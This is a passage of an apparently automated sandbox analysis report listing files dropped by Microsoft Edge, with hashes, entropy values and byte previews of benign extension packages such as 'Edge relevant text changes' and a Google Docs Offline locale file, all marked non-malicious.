                                                                                                                                                                                                                                                                                  Preview:{"logTime": "1210/174136", "correlationVector":"n+cQjwx5E4eyHGNSxeAQ3z","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1210/174136", "correlationVector":"A6A14A989F8E4F5CB0D8C801950CD5A9","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1210/174137", "correlationVector":"EZciDoBEgMwHN55MxKWyKV","action":"EXTENSION_UPDATER", "result":""}.

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\de009706-e747-4eec-903d-5a11ee0f15bb.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 41902
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):76319
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.996132588300074
                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                  SSDEEP:1536:hS5Vvm808scZeEzFrSpzBUl4MZIGM/iys3BBrYunau6w6DLZ8:GdS8scZNzFrMa4M+lK5/nEDd8
                                                                                                                                                                                                                                                                                  MD5:24439F0E82F6A60E541FB2697F02043F
                                                                                                                                                                                                                                                                                  SHA1:E3FAA84B0ED8CDD2268D53A0ECC6F3134D5EBD8F
                                                                                                                                                                                                                                                                                  SHA-256:B24DD5C374F8BB381A48605D183B6590245EE802C65F643632A3BE9BB1F313C5
                                                                                                                                                                                                                                                                                  SHA-512:8FD794657A9F80FDBC2350DC26A2C82DFD82266B934A4472B3319FDB870841C832137D4F5CE41D518859B8B1DA63031C6B7E750D301F87D6ECA45B958B147FCD
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:...........m{..(.}...7.\...N.D*.w..m..q....%XfL.*I.ql..;/.....s...E...0....`..A..[o^.^Y...F_.'.*.."L...^.......Y..W..l...E0..YY...:.&.u?....J..U<.q."...p.ib:.g.*.^.q.mr.....^&.{.E.....,EAp.q.......=.=.....z^.,d.^..J.R..zI4..2b?.-D5/.^...+.G..Y..?5..k........i.,.T#........_DV....P..d2......b\..L....o....Z.}../....CU.$.-..D9`..~......=....._.2O..?....b.{...7IY.L..q....K....T..5m.d.s.4.^... ..~<..7~6OS..b...^>.......s..n....k."..G.....L...z.U...... ... .ZY...,...kU1..N...(..V.r\$..s...X.It...x.mr..W....g........9DQR....*d......;L.S.....G... .._D.{.=.zI.g.Y~...`T..p.yO..4......8$..v.J..I.%..._.d.[..du5._._...?\..8.c.....U...fy.t....q.t....T@.......:zu..\,.!.I..AN_.....FeX..h.c.i.W.......(.....Y..F...R%.\..@.. 2(e,&.76..F+...l.t.$..`...........Wi.{.U.&(.b}...}.i..,...k....!..%...&.c..D-."..SQ.......q9....)j....7.".N....AX...).d./giR....uk.....s.....^...........:...~......(hP..K.@.&..?.E0:+D|9...U.q.cu..)t{.e...X...{.....z......LL&I6.=.

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\e5023b49-e542-4194-a49e-cdb6d93419fb.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):11185
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                  MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                  SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                  SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                  SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\e5923675-7a7b-45ef-b247-26f8964b3b6f.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 276634
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):263704
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.998774950072608
                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                  SSDEEP:6144:vj1QHfvuVtTT0bCnop1MIPG4y9XgcbKdhRuQRhzb6d0X7ayNC:vjq/GGCnorP0952dPuQRFW0X2yk
                                                                                                                                                                                                                                                                                  MD5:EF6DB67B82032D675EA4E61A73D3C358
                                                                                                                                                                                                                                                                                  SHA1:882A4CF2944FC8E27F435890DF647177AD167CB0
                                                                                                                                                                                                                                                                                  SHA-256:97C885F4390FFAE57EF240B46E113A0DFF637A003B6AD54031A1AA6809956276
                                                                                                                                                                                                                                                                                  SHA-512:B41B3CD76F50964CD4FA0AB18BEB785FA592CB92045B3455D238799A1167CB5190EB1C7E0216E1E874AA03A8686025A6B366926023C9C56834B92B4F612D0A18
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:............ko..q?....Am..0.<.M...e.B,[......|J..............x..8. .w73;;;;....L.....La.k&.k..........~...#..........%.Y.>}.j~.O.r..L....R.`..w......ta.'.....~:.9.'C...|..Gt...'..y..?...}..........,....1?..)QX....tgpgN.`..~...'.h.3^.s..UT...~o..R.].4^..V8"JwfnH...%..........i.qmG4.1@....a....\.i.C..Rq9.h....\..j...u..O..O.5!.}x....%j..}CW+.*..jaA.......-...*....P?..vA3+iU...N...%...x.E.8.Z..2HQw._.H8........+Lw].wL..........tc..l.+p..7..<).......Z.!..!i......?./.P9.y..;....,..C.K.....~.0........E...n..(..&.X...na-c.6.....Q.[.p.IO....[...W$....l7J.,..=EK.3Y...R...|..z_i.q......./.......[..5..qE.....FM+..VRB...r9!{3.....!...;.,{..}.sP..m..f.....~..2J..4.+..i6M...EW..ON..N.........4...T...j...1:..E=..<....Y..w.MV.....w.q.{...Y.....J...@.W..i.Sm;..0.1......./.4..b.wPbK.yeZ@.I...0.C.TZ$...-.+.[*......w.qG..}B^........n....#.........Y4.g4.....(.K..e..q7[.{..W....,%...z.^N...[/?......).9/?...r].oM2.'G.gu..Q|..._+......1^...9......-.j2lae..+!3

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_214158927\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1753
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                                  MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                                  SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                                  SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                                  SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_214158927\CRX_INSTALL\content.js

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):9815
                                                                                                                                                                                                                                                                                  Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                                  MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                                  SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                                  SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                                  SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_214158927\CRX_INSTALL\content_new.js

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):10388
                                                                                                                                                                                                                                                                                  Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                                  MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                                  SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                                  SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                                  SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_214158927\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):962
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                                  MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                                  SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                                  SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                                  SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_214158927\e5023b49-e542-4194-a49e-cdb6d93419fb.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):11185
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                  MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                  SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                  SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                  SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\1738ad1c-db3e-4ffc-b5c9-dd37ff4fabca.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):138356
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.809609231921042
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3072:AQ++ZdS5+fnwcxO+XwquyeNnmraugZ/1DOoncWD/5q:AQ++/PZmlyeNnh/1SmRq
                                                                                                                                                                                                                                                                                  MD5:3F6F93C3DCCD4A91C4EB25C7F6FEB1C1
                                                                                                                                                                                                                                                                                  SHA1:9B73F46ADFA1F4464929B408407E73D4535C6827
                                                                                                                                                                                                                                                                                  SHA-256:19F05352CB4C6E231C1C000B6C8B7E9EDCC1E8082CAF46FFF16B239D32AA7C9E
                                                                                                                                                                                                                                                                                  SHA-512:D488FA67E3A29D0147E9EAF2EABC74D9A255F8470CF79A4AEA60E3B3B5E48A3FCBC4FC3E9CE58DFF8D7D0CAA8AE749295F221E1FE1BA5D20DEB2D97544A12BA4
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........q.a.....E..i.t,..7C..7!...`l.-.......T.vH...~.....'..aH..C.oJOE..d..2..$J......I..;.(9l.(..+.N.6.@...].a.n.S.6..=.b.W.\....o...#.~J.W.1..E...2H....S.g0....../.H...y.O8...kE.,..m!..F.D.p......H..s.W ...#.L........Ij.........-..n..\..vD.d.V.....!......[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. ?Eq.M...[6^...+.].G..Y]...7..o.. U...v....P.J...@.E!...B.d..p..i".%............oo.<....~=..!t.+...`....h..LK....0....h...,.R%.....u...._..V_.q:_._..5}.uS\.....x?...~]..C-....S=L...._c.P.B....-M...62.i*.Q.....9.....+S=...../6:...W..ql/g..&j.y..{.."....|..F....|....V....w.%t.y..?..&..a..<.n....S+|..=.ra.....

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\128.png

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):4982
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                  MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                  SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                  SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                  SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\af\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):908
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                  MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                  SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                  SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                  SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\am\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1285
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                  Encrypted:false
